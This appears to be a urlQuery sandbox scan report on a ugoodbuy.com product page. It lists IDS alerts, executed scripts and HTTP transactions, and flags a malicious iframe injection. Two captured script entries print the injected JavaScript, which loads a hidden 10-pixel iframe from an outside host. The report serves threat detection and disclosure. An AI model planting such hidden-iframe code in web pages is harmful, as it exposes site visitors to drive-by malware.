Overview

URLhttp://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
IP74.220.215.240
ASNAS46606 Bluehost Inc.
Location United States
Report completed2012-11-06 23:12:52 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-06 23:12:13 74.220.215.240 urlQuery Client3http_inspect: JAVASCRIPT WHITESPACES EXCEEDS MAX ALLOWED


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 74.220.215.240

Date Alerts / IDS URL IP
2013-01-08 04:02:352 / 1http://www.ugoodbuy.com/new-simple-graceful-soft-silicone-back-cover-case-back-protec (...)74.220.215.240
2013-01-08 03:35:122 / 1http://www.ugoodbuy.com/simple-leather-case-for-samsung-p6800galaxy-tab-77-purple_g25 (...)74.220.215.240
2013-01-08 03:25:342 / 1http://www.ugoodbuy.com/digital-camera-battery-800mah-for-samsung-slb-0837b-replaceme (...)74.220.215.240
2013-01-04 08:11:463 / 0http://www.ugoodbuy.com/74.220.215.240
2013-01-04 08:11:313 / 0http://ugoodbuy.com/fm-transmitters_14874.220.215.240
2013-01-02 01:57:382 / 0http://www.ugoodbuy.com/faq_info.html?fcpath=1374.220.215.240

Last 6 reports on ASN: AS46606 Bluehost Inc.

Date Alerts / IDS URL IP
2012-12-08 12:38:462 / 2http://www.sovana.eu/styleie.css69.89.31.53
2012-12-08 12:25:152 / 2http://www.veryjunketing.com/dalai-mama-dishes/brownies.html66.147.244.176
2012-12-08 10:33:021 / 0http://captaincardiac.com/cd/tmp/go.php?sid=269.89.22.133
2012-12-08 09:56:311 / 1http://mystickitchen.com/173.254.28.41
2012-12-08 09:49:100 / 2http://crystalsoft.spotpig.com/mp3towmaconverter.exe67.222.35.243
2012-12-08 08:58:280 / 2http://www.cordeliascloset.com.au/74.220.219.146

Last 6 reports on domain: www.ugoodbuy.com

Date Alerts / IDS URL IP
2013-01-08 04:02:352 / 1http://www.ugoodbuy.com/new-simple-graceful-soft-silicone-back-cover-case-back-protector-for-sa (...)74.220.215.240
2013-01-08 03:35:122 / 1http://www.ugoodbuy.com/simple-leather-case-for-samsung-p6800galaxy-tab-77-purple_g2513.html74.220.215.240
2013-01-08 03:25:342 / 1http://www.ugoodbuy.com/digital-camera-battery-800mah-for-samsung-slb-0837b-replacement_g2497.h (...)74.220.215.240
2013-01-04 08:11:463 / 0http://www.ugoodbuy.com/74.220.215.240
2013-01-02 01:57:382 / 0http://www.ugoodbuy.com/faq_info.html?fcpath=1374.220.215.240
2012-12-24 18:18:041 / 0http://www.ugoodbuy.com/fm-transmitters_14874.220.215.240



JavaScript

Executed Scripts (64)


Executed Evals (3)

#1 JavaScript::Eval (size: 583, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://wfewthg.ns01.info/nt/stats.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://wfewthg.ns01.info/nt/stats.php');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#2 JavaScript::Eval (size: 10751, repeated: 1)

;
(function($) {
    $.fn.extend({
        autocomplete: function(b, d) {
            var c = typeof b == "string";
            d = $.extend({}, $.Autocompleter.defaults, {
                url: c ? b : null,
                data: c ? null : b,
                delay: c ? $.Autocompleter.defaults.delay : 10,
                max: d && !d.scroll ? 10 : 150
            }, d);
            d.highlight = d.highlight ||
            function(a) {
                return a
            };
            d.formatMatch = d.formatMatch || d.formatItem;
            return this.each(function() {
                new $.Autocompleter(this, d)
            })
        },
        result: function(a) {
            return this.bind("result", a)
        },
        search: function(a) {
            return this.trigger("search", [a])
        },
        flushCache: function() {
            return this.trigger("flushCache")
        },
        setOptions: function(a) {
            return this.trigger("setOptions", [a])
        },
        unautocomplete: function() {
            return this.trigger("unautocomplete")
        }
    });
    $.Autocompleter = function(o, r) {
        var t = {
            UP: 38,
            DOWN: 40,
            DEL: 46,
            TAB: 9,
            RETURN: 13,
            ESC: 27,
            COMMA: 188,
            PAGEUP: 33,
            PAGEDOWN: 34,
            BACKSPACE: 8
        };
        var u = $(o).attr("autocomplete", "off").addClass(r.inputClass);
        var p;
        var m = "";
        var n = $.Autocompleter.Cache(r);
        var s = 0;
        var k;
        var h = {
            mouseDownOnSelect: false
        };
        var l = $.Autocompleter.Select(r, o, selectCurrent, h);
        var j;
        $.browser.opera && $(o.form).bind("submit.autocomplete", function() {
            if (j) {
                j = false;
                return false
            }
        });
        u.bind(($.browser.opera ? "keypress" : "keydown") + ".autocomplete", function(a) {
            s = 1;
            k = a.keyCode;
            switch (a.keyCode) {
            case t.UP:
                a.preventDefault();
                if (l.visible()) {
                    l.prev()
                } else {
                    onChange(0, true)
                }
                break;
            case t.DOWN:
                a.preventDefault();
                if (l.visible()) {
                    l.next()
                } else {
                    onChange(0, true)
                }
                break;
            case t.PAGEUP:
                a.preventDefault();
                if (l.visible()) {
                    l.pageUp()
                } else {
                    onChange(0, true)
                }
                break;
            case t.PAGEDOWN:
                a.preventDefault();
                if (l.visible()) {
                    l.pageDown()
                } else {
                    onChange(0, true)
                }
                break;
            case r.multiple && $.trim(r.multipleSeparator) == "," && t.COMMA:
            case t.TAB:
            case t.RETURN:
                if (selectCurrent()) {
                    a.preventDefault();
                    j = true;
                    return false
                }
                break;
            case t.ESC:
                l.hide();
                break;
            default:
                clearTimeout(p);
                p = setTimeout(onChange, r.delay);
                break
            }
        }).focus(function() {
            s++
        }).blur(function() {
            s = 0;
            if (!h.mouseDownOnSelect) {
                hideResults()
            }
        }).click(function() {
            if (s++ > 1 && !l.visible()) {
                onChange(0, true)
            }
        }).bind("search", function() {
            var c = (arguments.length > 1) ? arguments[1] : null;

            function findValueCallback(q, a) {
                var b;
                if (a && a.length) {
                    for (var i = 0; i < a.length; i++) {
                        if (a[i].result.toLowerCase() == q.toLowerCase()) {
                            b = a[i];
                            break
                        }
                    }
                }
                if (typeof c == "function") c(b);
                else u.trigger("result", b && [b.data, b.value])
            }
            $.each(trimWords(u.val()), function(i, a) {
                request(a, findValueCallback, findValueCallback)
            })
        }).bind("flushCache", function() {
            n.flush()
        }).bind("setOptions", function() {
            $.extend(r, arguments[1]);
            if ("data" in arguments[1]) n.populate()
        }).bind("unautocomplete", function() {
            l.unbind();
            u.unbind();
            $(o.form).unbind(".autocomplete")
        });

        function selectCurrent() {
            var e = l.selected();
            if (!e) return false;
            var v = e.result;
            m = v;
            if (r.multiple) {
                var b = trimWords(u.val());
                if (b.length > 1) {
                    var f = r.multipleSeparator.length;
                    var c = $(o).selection().start;
                    var d, progress = 0;
                    $.each(b, function(i, a) {
                        progress += a.length;
                        if (c <= progress) {
                            d = i;
                            return false
                        }
                        progress += f
                    });
                    b[d] = v;
                    v = b.join(r.multipleSeparator)
                }
                v += r.multipleSeparator
            }
            u.val(v);
            hideResultsNow();
            u.trigger("result", [e.data, e.value]);
            return true
        }
        function onChange(b, c) {
            if (k == t.DEL) {
                l.hide();
                return
            }
            var a = u.val();
            if (!c && a == m) return;
            m = a;
            a = lastWord(a);
            if (a.length >= r.minChars) {
                u.addClass(r.loadingClass);
                if (!r.matchCase) a = a.toLowerCase();
                request(a, receiveData, hideResultsNow)
            } else {
                stopLoading();
                l.hide()
            }
        };

        function trimWords(b) {
            if (!b) return [""];
            if (!r.multiple) return [$.trim(b)];
            return $.map(b.split(r.multipleSeparator), function(a) {
                return $.trim(b).length ? $.trim(a) : null
            })
        }
        function lastWord(a) {
            if (!r.multiple) return a;
            var c = trimWords(a);
            if (c.length == 1) return c[0];
            var b = $(o).selection().start;
            if (b == a.length) {
                c = trimWords(a)
            } else {
                c = trimWords(a.replace(a.substring(b), ""))
            }
            return c[c.length - 1]
        }
        function autoFill(q, a) {
            if (r.autoFill && (lastWord(u.val()).toLowerCase() == q.toLowerCase()) && k != t.BACKSPACE) {
                u.val(u.val() + a.substring(lastWord(m).length));
                $(o).selection(m.length, m.length + a.length)
            }
        };

        function hideResults() {
            clearTimeout(p);
            p = setTimeout(hideResultsNow, 200)
        };

        function hideResultsNow() {
            var c = l.visible();
            l.hide();
            clearTimeout(p);
            stopLoading();
            if (r.mustMatch) {
                u.search(function(a) {
                    if (!a) {
                        if (r.multiple) {
                            var b = trimWords(u.val()).slice(0, -1);
                            u.val(b.join(r.multipleSeparator) + (b.length ? r.multipleSeparator : ""))
                        } else {
                            u.val("");
                            u.trigger("result", null)
                        }
                    }
                })
            }
        };

        function receiveData(q, a) {
            if (a && a.length && s) {
                stopLoading();
                l.display(a, q);
                autoFill(q, a[0].value);
                l.show()
            } else {
                hideResultsNow()
            }
        };

        function request(f, d, g) {
            if (!r.matchCase) f = f.toLowerCase();
            var e = n.load(f);
            if (e && e.length) {
                d(f, e)
            } else if ((typeof r.url == "string") && (r.url.length > 0)) {
                var c = {
                    timestamp: +new Date()
                };
                $.each(r.extraParams, function(a, b) {
                    c[a] = typeof b == "function" ? b() : b
                });
                $.ajax({
                    mode: "abort",
                    port: "autocomplete" + o.name,
                    dataType: r.dataType,
                    url: r.url,
                    data: $.extend({
                        q: lastWord(f),
                        limit: r.max
                    }, c),
                    success: function(a) {
                        var b = r.parse && r.parse(a) || parse(a);
                        n.add(f, b);
                        d(f, b)
                    }
                })
            } else {
                l.emptyList();
                g(f)
            }
        };

        function parse(c) {
            var d = [];
            var b = c.split("\n");
            for (var i = 0; i < b.length; i++) {
                var a = $.trim(b[i]);
                if (a) {
                    a = a.split("|");
                    d[d.length] = {
                        data: a,
                        value: a[0],
                        result: r.formatResult && r.formatResult(a, a[0]) || a[0]
                    }
                }
            }
            return d
        };

        function stopLoading() {
            u.removeClass(r.loadingClass)
        }
    };
    $.Autocompleter.defaults = {
        inputClass: "ac_input",
        resultsClass: "ac_results",
        loadingClass: "ac_loading",
        minChars: 1,
        delay: 400,
        matchCase: false,
        matchSubset: true,
        matchContains: false,
        cacheLength: 10,
        max: 100,
        mustMatch: false,
        extraParams: {},
        selectFirst: true,
        formatItem: function(a) {
            return a[0]
        },
        formatMatch: null,
        autoFill: false,
        width: 0,
        multiple: false,
        multipleSeparator: ", ",
        highlight: function(b, a) {
            return b.replace(new RegExp("(?![^&;]+;)(?!<[^<>]*)(" + a.replace(/([\^\$\(\)\[\]\{\}\*\.\+\?\|\\])/gi, "\\$1") + ")(?![^<>]*>)(?![^&;]+;)", "gi"), "<strong>$1</strong>")
        },
        scroll: true,
        scrollHeight: 180
    };
    $.Autocompleter.Cache = function(g) {
        var h = {};
        var j = 0;

        function matchSubset(s, a) {
            if (!g.matchCase) s = s.toLowerCase();
            var i = s.indexOf(a);
            if (g.matchContains == "word") {
                i = s.toLowerCase().search("\\b" + a.toLowerCase())
            }
            if (i == -1) return false;
            return i == 0 || g.matchContains
        };

        function add(q, a) {
            if (j > g.cacheLength) {
                flush()
            }
            if (!h[q]) {
                j++
            }
            h[q] = a
        }
        function populate() {
            if (!g.data) return false;
            var f = {},
                nullData = 0;
            if (!g.url) g.cacheLength = 1;
            f[""] = [];
            for (var i = 0, ol = g.data.length; i < ol; i++) {
                var c = g.data[i];
                c = (typeof c == "string") ? [c] : c;
                var d = g.formatMatch(c, i + 1, g.data.length);
                if (d === false) continue;
                var e = d.charAt(0).toLowerCase();
                if (!f[e]) f[e] = [];
                var b = {
                    value: d,
                    data: c,
                    result: g.formatResult && g.formatResult(c) || d
                };
                f[e].push(b);
                if (nullData++ < g.max) {
                    f[""].push(b)
                }
            };
            $.each(f, function(i, a) {
                g.cacheLength++;
                add(i, a)
            })
        }
        setTimeout(populate, 25);

        function flush() {
            h = {};
            j = 0
        }
        return {
            flush: flush,
            add: add,
            populate: populate,
            load: function(q) {
                if (!g.cacheLength || !j) return null;
                if (!g.url && g.matchContains) {
                    var a = [];
                    for (var k in h) {
                        if (k.length > 0) {
                            var c = h[k];
                            $.each(c, function(i, x) {
                                if (matchSubset(x.value, q)) {
                                    a.push(x)
                                }
                            })
                        }
                    }
                    return a
                } else if (h[q]) {
                    return h[q]
                } else if (g.matchSubset) {
                    for (var i = q.length - 1; i >= g.minChars; i--) {
                        var c = h[q.substr(0, i)];
                        if (c) {
                            var a = [];
                            $.each(c, function(i, x) {
                                if (matchSubset(x.value, q)) {
                                    a[a.length] = x
                                }
                            });
                            return a
                        }
                    }
                }
                return null
            }
        }
    };
    $.Autocompleter.Select = function(e, g, f, k) {
        var h = {
            ACTIVE: "ac_over"
        };
        var j, active = -1,
            data, term = "",
            needsInit = true,
            element, list;

        function init() {
            if (!needsInit) return;
            element = $("<div/>").hide().addClass(e.resultsClass).css("position", "absolute").appendTo(document.body);
            list = $("<ul/>").appendTo(element).mouseover(function(a) {
                if (target(a).nodeName && target(a).nodeName.toUpperCase() == 'LI') {
                    active = $("li", list).removeClass(h.ACTIVE).index(target(a));
                    $(target(a)).addClass(h.ACTIVE)
                }
            }).click(function(a) {
                $(target(a)).addClass(h.ACTIVE);
                f();
                g.focus();
                return false
            }).mousedown(function() {
                k.mouseDownOnSelect = true
            }).mouseup(function() {
                k.mouseDownOnSelect = false
            });
            if (e.width > 0) element.css("width", e.width);
            needsInit = false
        }
        function target(a) {
            var b = a.target;
            while (b && b.tagName != "LI") b = b.parentNode;
            if (!b) return [];
            return b
        }
        function moveSelect(b) {
            j.slice(active, active + 1).removeClass(h.ACTIVE);
            movePosition(b);
            var a = j.slice(active, active + 1).addClass(h.ACTIVE);
            if (e.scroll) {
                var c = 0;
                j.slice(0, active).each(function() {
                    c += this.offsetHeight
                });
                if ((c + a[0].offsetHeight - list.scrollTop()) > list[0].clientHeight) {
                    list.scrollTop(c + a[0].offsetHeight - list.innerHeight())
                } else if (c < list.scrollTop()) {
                    list.scrollTop(c)
                }
            }
        };

        function movePosition(a) {
            active += a;
            if (active < 0) {
                active = j.size() - 1
            } else if (active >= j.size()) {
                active = 0
            }
        }
        function limitNumberOfItems(a) {
            return e.max && e.max < a ? e.max : a
        }
        function fillList() {
            list.empty();
            var b = limitNumberOfItems(data.length);
            for (var i = 0; i < b; i++) {
                if (!data[i]) continue;
                var a = e.formatItem(data[i].data, i + 1, b, data[i].value, term);
                if (a === false) continue;
                var c = $("<li/>").html(e.highlight(a, term)).addClass(i % 2 == 0 ? "ac_even" : "ac_odd").appendTo(list)[0];
                $.data(c, "ac_data", data[i])
            }
            j = list.find("li");
            if (e.selectFirst) {
                j.slice(0, 1).addClass(h.ACTIVE);
                active = 0
            }
            if ($.fn.bgiframe) list.bgiframe()
        }
        return {
            display: function(d, q) {
                init();
                data = d;
                term = q;
                fillList()
            },
            next: function() {
                moveSelect(1)
            },
            prev: function() {
                moveSelect(-1)
            },
            pageUp: function() {
                if (active != 0 && active - 8 < 0) {
                    moveSelect(-active)
                } else {
                    moveSelect(-8)
                }
            },
            pageDown: function() {
                if (active != j.size() - 1 && active + 8 > j.size()) {
                    moveSelect(j.size() - 1 - active)
                } else {
                    moveSelect(8)
                }
            },
            hide: function() {
                element && element.hide();
                j && j.removeClass(h.ACTIVE);
                active = -1
            },
            visible: function() {
                return element && element.is(":visible")
            },
            current: function() {
                return this.visible() && (j.filter("." + h.ACTIVE)[0] || e.selectFirst && j[0])
            },
            show: function() {
                var a = $(g).offset();
                element.css({
                    width: typeof e.width == "string" || e.width > 0 ? e.width : $(g).width(),
                    top: a.top + g.offsetHeight,
                    left: a.left
                }).show();
                if (e.scroll) {
                    list.scrollTop(0);
                    list.css({
                        maxHeight: e.scrollHeight,
                        overflow: 'auto'
                    });
                    if ($.browser.msie && typeof document.body.style.maxHeight === "undefined") {
                        var c = 0;
                        j.each(function() {
                            c += this.offsetHeight
                        });
                        var b = c > e.scrollHeight;
                        list.css('height', b ? e.scrollHeight : c);
                        if (!b) {
                            j.width(list.width() - parseInt(j.css("padding-left")) - parseInt(j.css("padding-right")))
                        }
                    }
                }
            },
            selected: function() {
                var a = j && j.filter("." + h.ACTIVE).removeClass(h.ACTIVE);
                return a && a.length && $.data(a[0], "ac_data")
            },
            emptyList: function() {
                list && list.empty()
            },
            unbind: function() {
                element && element.remove()
            }
        }
    };
    $.fn.selection = function(b, f) {
        if (b !== undefined) {
            return this.each(function() {
                if (this.createTextRange) {
                    var a = this.createTextRange();
                    if (f === undefined || b == f) {
                        a.move("character", b);
                        a.select()
                    } else {
                        a.collapse(true);
                        a.moveStart("character", b);
                        a.moveEnd("character", f);
                        a.select()
                    }
                } else if (this.setSelectionRange) {
                    this.setSelectionRange(b, f)
                } else if (this.selectionStart) {
                    this.selectionStart = b;
                    this.selectionEnd = f
                }
            })
        }
        var c = this[0];
        if (c.createTextRange) {
            var e = document.selection.createRange(),
                orig = c.value,
                teststring = "<->",
                textLength = e.text.length;
            e.text = teststring;
            var d = c.value.indexOf(teststring);
            c.value = orig;
            this.selection(d, d + textLength);
            return {
                start: d,
                end: d + textLength
            }
        } else if (c.selectionStart !== undefined) {
            return {
                start: c.selectionStart,
                end: c.selectionEnd
            }
        }
    }
})(jQuery);

#3 JavaScript::Eval (size: 76, repeated: 1)

thefind.upfront.init('tf_upfront_badge', '1a9af1f38c6d1238c1cca1b87990a368')

Executed Writes (3)

#1 JavaScript::Write (size: 272, repeated: 1)

<a href="http://www.51.la/?9642476" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_12.gif" style="border:none" /></a>

#2 JavaScript::Write (size: 142, repeated: 1)

<iframe src='http://wfewthg.ns01.info/nt/stats.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

#3 JavaScript::Write (size: 210, repeated: 1)

<img style="width:0px;height:0px" src="http://web1.51.la:82/go.asp?svid=13&id=9642476&tpages=1&ttimes=1&tzone=1&tcolor=24&sSize=1176,885&referrer=&vpage=http%3A//www.ugoodbuy.com/cube-u18gt-elite_g3201.html" />


HTTP Transactions (121)


Request Response
GET /favicon.ico HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/vnd.microsoft.icon
Date: Tue, 06 Nov 2012 22:12:13 GMT
Server: Apache
Last-Modified: Fri, 29 Jun 2012 02:28:49 GMT
Etag: &quot;9a5800a-10be-4c3933551ba40&quot;
Accept-Ranges: bytes
Content-Length: 4286
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
GET /includes/templates/slucky/css/global.css HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 22:12:15 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:56:54 GMT
Etag: &quot;9a5c73f-13c6-4c251bc4ac980&quot;
Accept-Ranges: bytes
Content-Length: 5062
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
GET /includes/templates/slucky/css/style_news_add.css HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 22:12:15 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:57:04 GMT
Etag: &quot;9a5c766-f28-4c251bce36000&quot;
Accept-Ranges: bytes
Content-Length: 3880
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
GET /includes/templates/slucky/css/style_imagehover.css HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 22:12:15 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:57:03 GMT
Etag: &quot;9a5c762-1b2-4c251bcd41dc0&quot;
Accept-Ranges: bytes
Content-Length: 434
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
GET /includes/templates/slucky/css/print_stylesheet.css HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 22:12:15 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:56:59 GMT
Etag: &quot;9a5c754-2fe-4c251bc9714c0&quot;
Accept-Ranges: bytes
Content-Length: 766
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
GET /includes/templates/slucky/jscript/jscript_SpryMenuBar.js HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Tue, 06 Nov 2012 22:12:15 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:14:34 GMT
Etag: &quot;9a6016d-1d66-4c251fb791a80&quot;
Accept-Ranges: bytes
Content-Length: 7526
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
GET /includes/templates/slucky/css/style_en_default.css HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 22:12:15 GMT
Server: Apache
Last-Modified: Wed, 27 Jun 2012 09:46:27 GMT
Etag: &quot;9a5c75d-3d2d-4c37116bc42c0&quot;
Accept-Ranges: bytes
Content-Length: 15661
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
GET /includes/templates/slucky/jscript/jscript_frmCheck.js HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Tue, 06 Nov 2012 22:12:15 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:14:21 GMT
Etag: &quot;9a6014a-2516-4c251fabcbeb5&quot;
Accept-Ranges: bytes
Content-Length: 9494
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
GET /includes/templates/slucky/jscript/jscript_function.js HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Tue, 06 Nov 2012 22:12:16 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:14:22 GMT
Etag: &quot;9a6014f-3a6-4c251fac1ff80&quot;
Accept-Ranges: bytes
Content-Length: 934
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
GET /includes/templates/slucky/css/style_theme-1.css HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 22:12:15 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2012 09:22:33 GMT
Etag: &quot;9a5c775-9ab8-4c384df1a8840&quot;
Accept-Ranges: bytes
Content-Length: 39608
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
GET /cube-u18gt-elite_g3201.html HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Tue, 06 Nov 2012 22:12:13 GMT
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /includes/templates/slucky/css/style_sheets.css HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 22:12:15 GMT
Server: Apache
Last-Modified: Mon, 02 Jul 2012 04:44:14 GMT
Etag: &quot;9a5c76d-11dc9-4c3d173218380&quot;
Accept-Ranges: bytes
Content-Length: 73161
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
GET /js/250/addthis_widget.js HTTP/1.1

Host: s7.addthis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
